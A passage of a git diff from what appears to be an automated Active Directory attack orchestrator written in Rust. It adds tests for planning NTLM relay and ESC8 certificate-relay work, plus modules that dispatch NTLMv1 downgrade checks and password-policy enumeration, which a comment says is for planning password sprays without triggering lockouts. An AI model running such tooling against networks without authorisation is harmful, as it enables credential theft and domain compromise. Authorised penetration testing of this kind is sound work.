+ #[test]
+ fn target_ip_fallback_to_vuln_target() {
+ let details = serde_json::json!({});
+ let fallback = "192.168.58.99";
+ let target = details
+ .get("target_ip")
+ .or_else(|| details.get("ip"))
+ .and_then(|v| v.as_str())
+ .unwrap_or(fallback);
+ assert_eq!(target, "192.168.58.99");
+ }
+
+ #[test]
+ fn ca_host_extraction_fallback() {
+ let details = serde_json::json!({"ca_host": "192.168.58.10"});
+ let fallback = "192.168.58.99";
+ let ca_host = details
+ .get("ca_host")
+ .or_else(|| details.get("target_ip"))
+ .and_then(|v| v.as_str())
+ .unwrap_or(fallback);
+ assert_eq!(ca_host, "192.168.58.10");
+
+ let details2 = serde_json::json!({"target_ip": "192.168.58.20"});
+ let ca_host2 = details2
+ .get("ca_host")
+ .or_else(|| details2.get("target_ip"))
+ .and_then(|v| v.as_str())
+ .unwrap_or(fallback);
+ assert_eq!(ca_host2, "192.168.58.20");
+ }
+
+ #[test]
+ fn ca_name_extraction() {
+ let details = serde_json::json!({"ca_name": "contoso-CA"});
+ let ca_name = details
+ .get("ca_name")
+ .and_then(|v| v.as_str())
+ .unwrap_or("")
+ .to_string();
+ assert_eq!(ca_name, "contoso-CA");
+
+ let details2 = serde_json::json!({});
+ let ca_name2 = details2
+ .get("ca_name")
+ .and_then(|v| v.as_str())
+ .unwrap_or("")
+ .to_string();
+ assert_eq!(ca_name2, "");
+ }
+
+ #[test]
+ fn find_coercion_source_all_unprocessed() {
+ let mut dcs = HashMap::new();
+ dcs.insert("contoso.local".into(), "192.168.58.10".into());
+ dcs.insert("fabrikam.local".into(), "192.168.58.20".into());
+
+ let result = find_coercion_source(&dcs, |_| false);
+ assert!(result.is_some());
+ }
+
+ #[test]
+ fn relay_type_display_exhaustive() {
+ let smb = RelayType::SmbToLdap;
+ assert_eq!(format!("{smb}"), "smb_to_ldap");
+
+ let esc8 = RelayType::Esc8 {
+ ca_name: String::new(),
+ domain: String::new(),
+ };
+ assert_eq!(format!("{esc8}"), "esc8_adcs");
+ }
+
+ // --- collect_relay_work integration tests ---
+
+ use crate::orchestrator::state::SharedState;
+
+ fn make_cred() -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: "c1".into(),
+ username: "svcadmin".into(),
+ password: "S3cure!Pass".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "kerberoast".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_smb_vuln(id: &str, target_ip: &str) -> ares_core::models::VulnerabilityInfo {
+ let mut details = HashMap::new();
+ details.insert(
+ "target_ip".to_string(),
+ serde_json::Value::String(target_ip.to_string()),
+ );
+ ares_core::models::VulnerabilityInfo {
+ vuln_id: id.to_string(),
+ vuln_type: "smb_signing_disabled".to_string(),
+ target: target_ip.to_string(),
+ discovered_by: "scanner".to_string(),
+ discovered_at: chrono::Utc::now(),
+ details,
+ recommended_agent: String::new(),
+ priority: 5,
+ }
+ }
+
+ fn make_esc8_vuln(
+ id: &str,
+ ca_host: &str,
+ ca_name: &str,
+ domain: &str,
+ ) -> ares_core::models::VulnerabilityInfo {
+ let mut details = HashMap::new();
+ details.insert(
+ "ca_host".to_string(),
+ serde_json::Value::String(ca_host.to_string()),
+ );
+ details.insert(
+ "ca_name".to_string(),
+ serde_json::Value::String(ca_name.to_string()),
+ );
+ details.insert(
+ "domain".to_string(),
+ serde_json::Value::String(domain.to_string()),
+ );
+ ares_core::models::VulnerabilityInfo {
+ vuln_id: id.to_string(),
+ vuln_type: "esc8".to_string(),
+ target: ca_host.to_string(),
+ discovered_by: "scanner".to_string(),
+ discovered_at: chrono::Utc::now(),
+ details,
+ recommended_agent: String::new(),
+ priority: 8,
+ }
+ }
+
+ #[tokio::test]
+ async fn collect_relay_work_empty_state() {
+ let shared = SharedState::new("test".into());
+ let state = shared.read().await;
+ let work = collect_relay_work(&state, "192.168.58.100");
+ assert!(work.is_empty(), "empty state should produce no work");
+ }
+
+ #[tokio::test]
+ async fn collect_relay_work_no_credentials() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ s.discovered_vulnerabilities
+ .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22"));
+ }
+ let state = shared.read().await;
+ let work = collect_relay_work(&state, "192.168.58.100");
+ assert!(work.is_empty(), "no credentials should produce no work");
+ }
+
+ #[tokio::test]
+ async fn collect_relay_work_smb_signing_disabled() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ s.credentials.push(make_cred());
+ s.discovered_vulnerabilities
+ .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22"));
+ s.domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ }
+ let state = shared.read().await;
+ let work = collect_relay_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "smb_relay:192.168.58.22");
+ assert_eq!(work[0].relay_target, "192.168.58.22");
+ assert_eq!(work[0].listener, "192.168.58.100");
+ assert!(matches!(work[0].relay_type, RelayType::SmbToLdap));
+ assert_eq!(work[0].coercion_source, Some("192.168.58.10".into()));
+ assert_eq!(work[0].credential.username, "svcadmin");
+ }
+
+ #[tokio::test]
+ async fn collect_relay_work_esc8_vuln() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ s.credentials.push(make_cred());
+ s.discovered_vulnerabilities.insert(
+ "v2".into(),
+ make_esc8_vuln("v2", "192.168.58.30", "contoso-CA", "contoso.local"),
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_relay_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "esc8_relay:192.168.58.30");
+ assert_eq!(work[0].relay_target, "192.168.58.30");
+ match &work[0].relay_type {
+ RelayType::Esc8 { ca_name, domain } => {
+ assert_eq!(ca_name, "contoso-CA");
+ assert_eq!(domain, "contoso.local");
+ }
+ _ => panic!("expected Esc8 relay type"),
+ }
+ // No DCs configured → coercion_source is None
+ assert!(work[0].coercion_source.is_none());
+ }
+
+ #[tokio::test]
+ async fn collect_relay_work_skips_already_processed_dedup() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ s.credentials.push(make_cred());
+ s.discovered_vulnerabilities
+ .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22"));
+ // Mark the relay key as already processed
+ s.mark_processed(DEDUP_SET, "smb_relay:192.168.58.22".into());
+ }
+ let state = shared.read().await;
+ let work = collect_relay_work(&state, "192.168.58.100");
+ assert!(
+ work.is_empty(),
+ "already-processed dedup key should be skipped"
+ );
+ }
+
+ #[tokio::test]
+ async fn collect_relay_work_skips_exploited_vulns() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ s.credentials.push(make_cred());
+ s.discovered_vulnerabilities
+ .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22"));
+ s.exploited_vulnerabilities.insert("v1".into());
+ }
+ let state = shared.read().await;
+ let work = collect_relay_work(&state, "192.168.58.100");
+ assert!(work.is_empty(), "exploited vulns should be skipped");
+ }
+
+ #[tokio::test]
+ async fn collect_relay_work_multiple_vulns() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ s.credentials.push(make_cred());
+ s.discovered_vulnerabilities
+ .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22"));
+ s.discovered_vulnerabilities
+ .insert("v2".into(), make_smb_vuln("v2", "192.168.58.23"));
+ s.discovered_vulnerabilities.insert(
+ "v3".into(),
+ make_esc8_vuln("v3", "192.168.58.30", "contoso-CA", "contoso.local"),
+ );
+ s.domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ }
+ let state = shared.read().await;
+ let work = collect_relay_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 3, "should produce work for all 3 vulns");
+
+ let smb_count = work
+ .iter()
+ .filter(|w| matches!(w.relay_type, RelayType::SmbToLdap))
+ .count();
+ let esc8_count = work
+ .iter()
+ .filter(|w| matches!(w.relay_type, RelayType::Esc8 { .. }))
+ .count();
+ assert_eq!(smb_count, 2);
+ assert_eq!(esc8_count, 1);
+ }
+
+ #[tokio::test]
+ async fn collect_relay_work_ignores_unrelated_vuln_types() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ s.credentials.push(make_cred());
+ // Add an unrelated vuln type
+ let mut details = HashMap::new();
+ details.insert(
+ "target_ip".to_string(),
+ serde_json::Value::String("192.168.58.40".to_string()),
+ );
+ s.discovered_vulnerabilities.insert(
+ "v_unrelated".into(),
+ ares_core::models::VulnerabilityInfo {
+ vuln_id: "v_unrelated".into(),
+ vuln_type: "mssql_impersonation".into(),
+ target: "192.168.58.40".into(),
+ discovered_by: "scanner".into(),
+ discovered_at: chrono::Utc::now(),
+ details,
+ recommended_agent: String::new(),
+ priority: 3,
+ },
+ );
+ }
+ let state = shared.read().await;
+ let work = collect_relay_work(&state, "192.168.58.100");
+ assert!(
+ work.is_empty(),
+ "unrelated vuln types should not produce work"
+ );
+ }
+
+ #[tokio::test]
+ async fn collect_relay_work_esc8_already_processed() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ s.credentials.push(make_cred());
+ s.discovered_vulnerabilities.insert(
+ "v2".into(),
+ make_esc8_vuln("v2", "192.168.58.30", "contoso-CA", "contoso.local"),
+ );
+ s.mark_processed(DEDUP_SET, "esc8_relay:192.168.58.30".into());
+ }
+ let state = shared.read().await;
+ let work = collect_relay_work(&state, "192.168.58.100");
+ assert!(work.is_empty(), "already-processed esc8 should be skipped");
+ }
+
+ #[tokio::test]
+ async fn collect_relay_work_mixed_exploited_and_fresh() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ s.credentials.push(make_cred());
+ s.discovered_vulnerabilities
+ .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22"));
+ s.discovered_vulnerabilities
+ .insert("v2".into(), make_smb_vuln("v2", "192.168.58.23"));
+ // Only v1 is exploited
+ s.exploited_vulnerabilities.insert("v1".into());
+ }
+ let state = shared.read().await;
+ let work = collect_relay_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].relay_target, "192.168.58.23");
+ }
+
+ #[tokio::test]
+ async fn collect_relay_work_coercion_source_prefers_uncoerced_dc() {
+ let shared = SharedState::new("test".into());
+ {
+ let mut s = shared.write().await;
+ s.credentials.push(make_cred());
+ s.discovered_vulnerabilities
+ .insert("v1".into(), make_smb_vuln("v1", "192.168.58.22"));
+ s.domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ s.domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ // Mark first DC as already coerced
+ s.mark_processed(DEDUP_COERCED_DCS, "192.168.58.10".into());
+ }
+ let state = shared.read().await;
+ let work = collect_relay_work(&state, "192.168.58.100");
+ assert_eq!(work.len(), 1);
+ assert_eq!(
+ work[0].coercion_source,
+ Some("192.168.58.20".into()),
+ "should prefer the uncoerced DC"
+ );
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/ntlmv1_downgrade.rs b/ares-cli/src/orchestrator/automation/ntlmv1_downgrade.rs
new file mode 100644
index 00000000..a89c9a77
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/ntlmv1_downgrade.rs
@@ -0,0 +1,382 @@
+//! auto_ntlmv1_downgrade -- detect DCs allowing NTLMv1 authentication.
+//!
+//! When a DC accepts NTLMv1 (LmCompatibilityLevel < 3), attackers can
+//! downgrade authentication and capture NTLMv1 hashes via Responder/MITM;
+//! those hashes are trivially crackable. This module dispatches a check per DC.
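+//!
+//! As a rough sketch (illustrative only; the real probe runs in the recon
+//! worker), the downgrade condition reduces to the `LmCompatibilityLevel`
+//! registry value:
+//!
+//! ```ignore
+//! /// Levels 0-2 still permit NTLMv1; 3 and above require NTLMv2.
+//! fn allows_ntlmv1(lm_compatibility_level: u32) -> bool {
+//!     lm_compatibility_level < 3
+//! }
+//! assert!(allows_ntlmv1(2));
+//! assert!(!allows_ntlmv1(5));
+//! ```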
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect NTLMv1 downgrade work items from state (pure logic, no async).
+fn collect_ntlmv1_work(state: &StateInner) -> Vec<NtlmV1Work> {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ let dedup_key = format!("ntlmv1:{}", dc_ip);
+ if state.is_processed(DEDUP_NTLMV1_DOWNGRADE, &dedup_key) {
+ continue;
+ }
+
+ let cred = match state
+ .credentials
+ .iter()
+ .find(|c| c.domain.to_lowercase() == domain.to_lowercase())
+ .or_else(|| state.credentials.first())
+ {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(NtlmV1Work {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Checks each DC for NTLMv1 downgrade vulnerability.
+/// Interval: 45s.
+pub async fn auto_ntlmv1_downgrade(
+    dispatcher: Arc<Dispatcher>,
+    mut shutdown: watch::Receiver<bool>,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("ntlmv1_downgrade") {
+ continue;
+ }
+
+        let work: Vec<NtlmV1Work> = {
+ let state = dispatcher.state.read().await;
+ collect_ntlmv1_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "ntlmv1_downgrade_check",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("ntlmv1_downgrade");
+ match dispatcher
+ .throttled_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "NTLMv1 downgrade check dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_NTLMV1_DOWNGRADE, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_NTLMV1_DOWNGRADE, &item.dedup_key)
+ .await;
+
+ // Register ntlmv1_downgrade vulnerability proactively so it
+ // appears in reports without waiting for the agent's
+ // report_finding callback (which only logs).
+ let vuln = ares_core::models::VulnerabilityInfo {
+ vuln_id: format!("ntlmv1_{}", item.dc_ip.replace('.', "_")),
+ vuln_type: "ntlmv1_downgrade".to_string(),
+ target: item.dc_ip.clone(),
+ discovered_by: "auto_ntlmv1_downgrade".to_string(),
+ discovered_at: chrono::Utc::now(),
+ details: {
+ let mut d = std::collections::HashMap::new();
+ d.insert("target_ip".to_string(), json!(item.dc_ip));
+ d.insert("domain".to_string(), json!(item.domain));
+ d.insert(
+ "description".to_string(),
+ json!("DC allows NTLMv1 authentication (LmCompatibilityLevel < 3). NTLMv1 hashes are trivially crackable."),
+ );
+ d
+ },
+ recommended_agent: "credential_access".to_string(),
+ priority: dispatcher.effective_priority("ntlmv1_downgrade"),
+ };
+
+ match dispatcher
+ .state
+ .publish_vulnerability_with_strategy(
+ &dispatcher.queue,
+ vuln,
+ Some(&dispatcher.config.strategy),
+ )
+ .await
+ {
+ Ok(true) => {
+ info!(
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "NTLMv1 downgrade — vulnerability registered"
+ );
+ }
+ Ok(false) => {}
+ Err(e) => {
+ warn!(err = %e, dc = %item.dc_ip, "Failed to publish NTLMv1 downgrade vulnerability");
+ }
+ }
+ }
+ Ok(None) => {
+ debug!(domain = %item.domain, "NTLMv1 downgrade check deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch NTLMv1 downgrade check");
+ }
+ }
+ }
+ }
+}
+
+struct NtlmV1Work {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("ntlmv1:{}", "192.168.58.10");
+ assert_eq!(key, "ntlmv1:192.168.58.10");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_NTLMV1_DOWNGRADE, "ntlmv1_downgrade");
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let payload = json!({
+ "technique": "ntlmv1_downgrade_check",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+ assert_eq!(payload["technique"], "ntlmv1_downgrade_check");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = NtlmV1Work {
+ dedup_key: "ntlmv1:192.168.58.10".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: cred,
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.credential.username, "admin");
+ }
+
+ #[test]
+ fn dedup_key_uses_dc_ip() {
+ // NTLMv1 dedup is by DC IP, not domain
+ let key = format!("ntlmv1:{}", "192.168.58.10");
+ assert!(key.starts_with("ntlmv1:"));
+ assert!(key.contains("192.168.58.10"));
+ }
+
+ // --- collect_ntlmv1_work tests ---
+
+ use crate::orchestrator::state::StateInner;
+
+ fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: uuid::Uuid::new_v4().to_string(),
+ username: username.to_string(),
+ password: "P@ssw0rd!".to_string(), // pragma: allowlist secret
+ domain: domain.to_string(),
+ source: String::new(),
+ discovered_at: None,
+ is_admin: false,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn collect_empty_state_produces_no_work() {
+ let state = StateInner::new("test".into());
+ let work = collect_ntlmv1_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_produces_no_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_ntlmv1_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dc_with_matching_cred_produces_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ let work = collect_ntlmv1_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].dedup_key, "ntlmv1:192.168.58.10");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_skips_already_processed_dedup() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ state.mark_processed(DEDUP_NTLMV1_DOWNGRADE, "ntlmv1:192.168.58.10".into());
+ let work = collect_ntlmv1_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_falls_back_to_first_credential() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_cred("fabuser", "fabrikam.local"));
+ let work = collect_ntlmv1_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "fabuser");
+ }
+
+ #[test]
+ fn collect_multiple_dcs_produces_multiple_work() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ state
+ .credentials
+ .push(make_cred("fabadmin", "fabrikam.local"));
+ let work = collect_ntlmv1_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+
+ #[test]
+ fn collect_dedup_key_uses_ip_not_domain() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state.credentials.push(make_cred("admin", "contoso.local"));
+ let work = collect_ntlmv1_work(&state);
+ assert_eq!(work.len(), 1);
+ assert!(work[0].dedup_key.starts_with("ntlmv1:"));
+ assert!(work[0].dedup_key.contains("192.168.58.10"));
+ assert!(!work[0].dedup_key.contains("contoso"));
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_credential() {
+ let mut state = StateInner::new("test".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_cred("fabuser", "fabrikam.local"));
+ state
+ .credentials
+ .push(make_cred("conuser", "contoso.local"));
+ let work = collect_ntlmv1_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "conuser");
+ }
+
+ #[test]
+ fn dedup_keys_differ_per_dc() {
+ let key1 = format!("ntlmv1:{}", "192.168.58.10");
+ let key2 = format!("ntlmv1:{}", "192.168.58.20");
+ assert_ne!(key1, key2);
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/password_policy.rs b/ares-cli/src/orchestrator/automation/password_policy.rs
new file mode 100644
index 00000000..9ae27ca8
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/password_policy.rs
@@ -0,0 +1,380 @@
+//! auto_password_policy -- enumerate password policy per domain.
+//!
+//! Password policies reveal lockout thresholds, complexity requirements, and
+//! minimum lengths. This information is critical for planning password spray
+//! attacks without triggering lockouts.
+//!
+//! Dispatches `password_policy` recon tasks per discovered domain+DC pair.
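+//!
+//! For example, a spray planner could derive a per-user attempt budget from
+//! the enumerated policy (a minimal sketch; the struct and safety margin are
+//! assumptions, not the worker's actual model):
+//!
+//! ```ignore
+//! struct PasswordPolicy {
+//!     lockout_threshold: u32, // 0 means lockout is disabled
+//! }
+//!
+//! /// Attempts per user per lockout window, keeping a safety margin of 2.
+//! fn spray_budget(policy: &PasswordPolicy) -> u32 {
+//!     match policy.lockout_threshold {
+//!         0 => u32::MAX,
+//!         t => t.saturating_sub(2),
+//!     }
+//! }
+//! ```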
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+fn collect_password_policy_work(state: &StateInner) -> Vec<PasswordPolicyWork> {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ let dedup_key = format!("policy:{}", domain.to_lowercase());
+ if state.is_processed(DEDUP_PASSWORD_POLICY, &dedup_key) {
+ continue;
+ }
+
+ let cred = match state
+ .credentials
+ .iter()
+ .find(|c| c.domain.to_lowercase() == domain.to_lowercase())
+ .or_else(|| state.credentials.first())
+ {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(PasswordPolicyWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Enumerates password policy on each domain controller.
+/// Interval: 30s.
+pub async fn auto_password_policy(
+    dispatcher: Arc<Dispatcher>,
+    mut shutdown: watch::Receiver<bool>,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(30));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("password_policy") {
+ continue;
+ }
+
+        let work: Vec<PasswordPolicyWork> = {
+ let state = dispatcher.state.read().await;
+ collect_password_policy_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "password_policy",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("password_policy");
+ match dispatcher
+ .throttled_submit("recon", "credential_access", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "Password policy enumeration dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_PASSWORD_POLICY, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_PASSWORD_POLICY, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(domain = %item.domain, "Password policy task deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch password policy enum");
+ }
+ }
+ }
+ }
+}
+
+struct PasswordPolicyWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::orchestrator::state::StateInner;
+
+ fn make_credential(
+ username: &str,
+ password: &str,
+ domain: &str,
+ ) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("policy:{}", "contoso.local");
+ assert_eq!(key, "policy:contoso.local");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_PASSWORD_POLICY, "password_policy");
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let payload = json!({
+ "technique": "password_policy",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+ assert_eq!(payload["technique"], "password_policy");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert_eq!(payload["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = PasswordPolicyWork {
+ dedup_key: "policy:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: cred,
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.dedup_key, "policy:contoso.local");
+ }
+
+ #[test]
+ fn dedup_key_normalizes_domain() {
+ let key = format!("policy:{}", "CONTOSO.LOCAL".to_lowercase());
+ assert_eq!(key, "policy:contoso.local");
+ }
+
+ #[test]
+ fn dedup_keys_differ_per_domain() {
+ let key1 = format!("policy:{}", "contoso.local");
+ let key2 = format!("policy:{}", "fabrikam.local");
+ assert_ne!(key1, key2);
+ }
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_password_policy_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_password_policy_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_domain_controllers_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_password_policy_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_domain_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
